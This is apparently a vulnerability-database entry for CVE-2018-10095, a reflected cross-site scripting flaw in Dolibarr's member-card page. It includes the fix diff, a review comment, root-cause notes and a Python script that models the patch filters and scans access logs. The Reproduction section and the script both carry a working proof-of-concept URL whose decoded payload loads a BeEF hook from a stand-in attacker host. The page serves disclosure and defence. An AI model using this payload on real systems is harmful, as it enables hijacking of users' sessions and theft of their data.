CVE-2018-10095
Description
Cross-site scripting vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script via the foruserlogin parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Dolibarr versions before 7.0.2 are vulnerable to a reflected cross-site scripting (XSS) attack in the adherents/cartes/carte.php script. The foruserlogin parameter is not properly sanitized; the test_sql_and_script_inject() function used for security checks fails to block many XSS payloads, allowing arbitrary HTML and JavaScript injection [2][3].
Exploitation
An unauthenticated remote attacker can craft a malicious URL containing a JavaScript payload in the foruserlogin parameter and trick a logged-in Dolibarr user into clicking it. No special network position or authentication is required; the attack relies on user interaction (e.g., clicking the manipulated link). The injected script executes in the victim's browser within the context of the Dolibarr session [2][3].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser, leading to disclosure of sensitive information such as session cookies, credentials, or other data accessible via the Dolibarr interface. The CVSS v3.0 score is 7.4 (High) with Confidentiality impact High and Scope Changed, indicating the injected script can affect resources beyond the vulnerable component [2][4].
Mitigation
The vulnerability is fixed in Dolibarr version 7.0.2, released prior to the public disclosure. Users should upgrade to 7.0.2 or later immediately. No workarounds are documented; the only effective mitigation is applying the patch [2][3][4].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| dolibarr/dolibarr (Packagist) | < 7.0.2 | 7.0.2 |
Affected products
Patches (1)
1. 1dc466e1fb68 FIX CVE-2018-10095
1 file changed · +6 −7
htdocs/adherents/cartes/carte.php+6 −7 modified@@ -29,19 +29,18 @@ require_once DOL_DOCUMENT_ROOT.'/core/modules/member/modules_cards.php'; require_once DOL_DOCUMENT_ROOT.'/core/modules/printsheet/modules_labels.php'; -$langs->load("members"); -$langs->load("errors"); +$langs->loadLangs(array("members","errors")); // Choix de l'annee d'impression ou annee courante. $now = dol_now(); $year=dol_print_date($now,'%Y'); $month=dol_print_date($now,'%m'); $day=dol_print_date($now,'%d'); -$foruserid=GETPOST('foruserid'); -$foruserlogin=GETPOST('foruserlogin'); -$mode=GETPOST('mode'); -$model=GETPOST("model"); // Doc template to use for business cards -$modellabel=GETPOST("modellabel"); // Doc template to use for address sheet +$foruserid=GETPOST('foruserid','alphanohtml'); +$foruserlogin=GETPOST('foruserlogin','alphanohtml'); +$mode=GETPOST('mode','aZ09'); +$model=GETPOST("model",'aZ09'); // Doc template to use for business cards +$modellabel=GETPOST("modellabel",'aZ09'); // Doc template to use for address sheet $mesg=''; $adherentstatic=new Adherent($db);
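Review bot: `$foruserid` is read with `'alphanohtml'` although, going by its name, it should hold a numeric id; `GETPOST('foruserid','int')` would reject anything but digits, the same way `'aZ09'` now does for `$mode`, `$model` and `$modellabel`. Two further points on this hunk: it hardens the input side only, and the place where `$foruserlogin` is written into the page is not in the diff, so the reviewer should confirm that reflection point also HTML-escapes the value (tag stripping is not attribute-context escaping); and the `$langs->loadLangs(array("members","errors"))` change is a refactor unrelated to the CVE, which would be easier to backport to maintenance branches as its own commit.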
Vulnerability mechanics
Root cause
"Missing input type validation on the `foruserlogin` GET parameter allows unescaped HTML/JavaScript to be reflected into the page."
Attack vector
An unauthenticated remote attacker can inject arbitrary HTML or JavaScript by sending a crafted GET request to `adherents/cartes/carte.php` with a malicious `foruserlogin` parameter [ref_id=2]. The application's existing `test_sql_and_script_inject()` filter blocks some XSS patterns but not the payload used in the proof of concept, so the value reaches the page unmodified.
Affected code
The vulnerable file is `htdocs/adherents/cartes/carte.php`. The GET parameters `foruserlogin`, `foruserid`, `mode`, `model`, and `modellabel` were fetched without a type filter, allowing arbitrary input to be reflected into the HTML page output.
What the fix does
The patch adds a second argument to each `GETPOST()` call in `carte.php`, specifying a type filter [patch_id=1703321]: `'alphanohtml'` for `foruserid` and `foruserlogin`, which strips HTML tags from the value, and `'aZ09'` for `mode`, `model` and `modellabel`, which accepts only letters, digits and underscores and discards anything else. A `<script>` tag therefore cannot reach the page through these parameters. The commit hardens the input side only; the diff does not touch the point where the value is echoed, so output escaping there is not part of this change, and other scripts that reflect request parameters without a filter are not covered by it.
Preconditions
- auth: No authentication is required on the attacker's side; the injected script runs in the browser of the logged-in Dolibarr user who opens the crafted link
- network: Attacker must be able to send HTTP GET requests to the Dolibarr instance, or get a victim's browser to send them
- input: The foruserlogin parameter is reflected into the page without sanitization
Reproduction
Visit the following URL (replace the host and port with your target): `http://dolibarr.lab:2080/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160&optioncss=print` [ref_id=2]. The decoded value of `foruserlogin` is `"><script src="https://attack.lab/beef/hook.js"></script>`: the leading `">` closes the attribute the login appears to be reflected into, and the script tag loads a remote hook (a BeEF hook in the proof of concept) that then runs with the victim's Dolibarr session. Exploitation is confirmed by an outbound request to the hook URL from the victim's browser; on 7.0.2 or later the filtered value no longer contains the script tag.
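The following is an added example in Python, not Dolibarr code, that ties the Reproduction section to the "What the fix does" section above. It decodes the proof-of-concept URL into the raw parameter values the vulnerable `carte.php` received, runs them through a model of the two `GETPOST()` filter modes the patch introduces (`'alphanohtml'` approximated as stripping `<...>` tag sequences, `'aZ09'` as a `[A-Za-z0-9_]` allowlist; Dolibarr's real functions may differ in detail), and flags exploitation attempts in access-log lines. The host names, IP addresses and log lines are constructed for the example.

```python
"""Added example for CVE-2018-10095; this is not Dolibarr code.

It decodes the advisory's proof-of-concept URL, models the two GETPOST()
filter modes the fix introduces ('alphanohtml' approximated as tag
stripping, 'aZ09' as a [A-Za-z0-9_] allowlist; Dolibarr's real functions
may differ in detail) and flags exploitation attempts in access-log lines.
Host names, IP addresses and log lines below are constructed.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/adherents/cartes/carte.php"

# Proof-of-concept URL from the advisory (host and port are placeholders).
REPRO_URL = (
    "http://dolibarr.lab:2080/dolibarr/adherents/cartes/carte.php?"
    "&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d"
    "%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66"
    "%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160"
    "&optioncss=print"
)


def decode_params(url: str) -> dict:
    """First value of every query parameter, percent-decoded: what PHP's
    $_GET held before the patch added any GETPOST() filtering."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


_TAG = re.compile(r"<[^<>]+>")


def filter_alphanohtml(value: str) -> str:
    """Model of the 'alphanohtml' mode: trim, then remove <...> sequences.
    Two passes so a tag hidden inside another tag's attribute also goes."""
    out = value.strip()
    for _ in range(2):
        out = _TAG.sub("", out)
    return out


def filter_az09(value: str) -> str:
    """Model of the 'aZ09' mode: letters, digits and underscore only;
    anything else turns the whole value into an empty string."""
    out = value.strip()
    return out if re.fullmatch(r"[A-Za-z0-9_]+", out) else ""


# The five GETPOST() calls the patch changes, with the mode each now uses.
PATCHED_FILTERS = {
    "foruserid": filter_alphanohtml,
    "foruserlogin": filter_alphanohtml,
    "mode": filter_az09,
    "model": filter_az09,
    "modellabel": filter_az09,
}


def apply_patched_filters(params: dict) -> dict:
    """Values the fixed carte.php would see for the parameters it reads."""
    return {k: f(params[k]) for k, f in PATCHED_FILTERS.items() if k in params}


def escape_for_attribute(value: str) -> str:
    """Output-side escaping (not part of the patch): the second layer that
    stops a stray quote surviving the input filter from closing an attribute."""
    return html.escape(value, quote=True)


# --- detection over combined-format (Apache/nginx) access logs -------------

_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
_HOSTILE = re.compile(r"""[<>"']|javascript:""", re.IGNORECASE)


def scan_access_log(lines):
    """Return (ip, timestamp, parameter, decoded value) for requests to
    carte.php whose filtered parameters carry HTML or JavaScript metacharacters."""
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m or not urlsplit(m["target"]).path.endswith(TARGET_PATH):
            continue
        for name, value in decode_params(m["target"]).items():
            if name in PATCHED_FILTERS and _HOSTILE.search(value):
                hits.append((m["ip"], m["ts"], name, value))
    return hits


# Constructed log lines: one exploitation attempt, one benign use, one unrelated.
_u = urlsplit(REPRO_URL)
SAMPLE_LOG = [
    f'203.0.113.7 - - [21/May/2018:10:04:12 +0000] "GET {_u.path}?{_u.query} HTTP/1.1" 200 5120',
    '198.51.100.4 - - [21/May/2018:10:05:01 +0000] "GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=jdoe&model=5160 HTTP/1.1" 200 4980',
    '198.51.100.4 - - [21/May/2018:10:05:30 +0000] "GET /dolibarr/index.php?mainmenu=home HTTP/1.1" 200 8811',
]


if __name__ == "__main__":
    raw = decode_params(REPRO_URL)
    patched = apply_patched_filters(raw)
    print("raw foruserlogin:      ", raw["foruserlogin"])
    print("after 'alphanohtml':   ", patched["foruserlogin"])
    print("escaped for attribute: ", escape_for_attribute(patched["foruserlogin"]))
    for hit in scan_access_log(SAMPLE_LOG):
        print("exploitation attempt:", hit)
```

In this model the tag-stripping filter leaves `">` behind, which is why the reviewer's check on output escaping at the reflection point matters: a value that can no longer carry a tag can still close an attribute unless it is also HTML-escaped where it is echoed. The `'aZ09'` mode, by contrast, empties the value entirely, which is the safer choice wherever a parameter only ever holds an identifier.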
Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-p2fm-8rhj-58fr (GHSA advisory)
- nvd.nist.gov/vuln/detail/CVE-2018-10095 (NVD entry)
- www.openwall.com/lists/oss-security/2018/05/21/3 (oss-security mailing list)
- github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog (vendor ChangeLog, 7.0.2)
- github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 (fix commit)
- sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability (Sysdream advisory; also listed by MITRE)
News mentions
No linked articles in our index yet.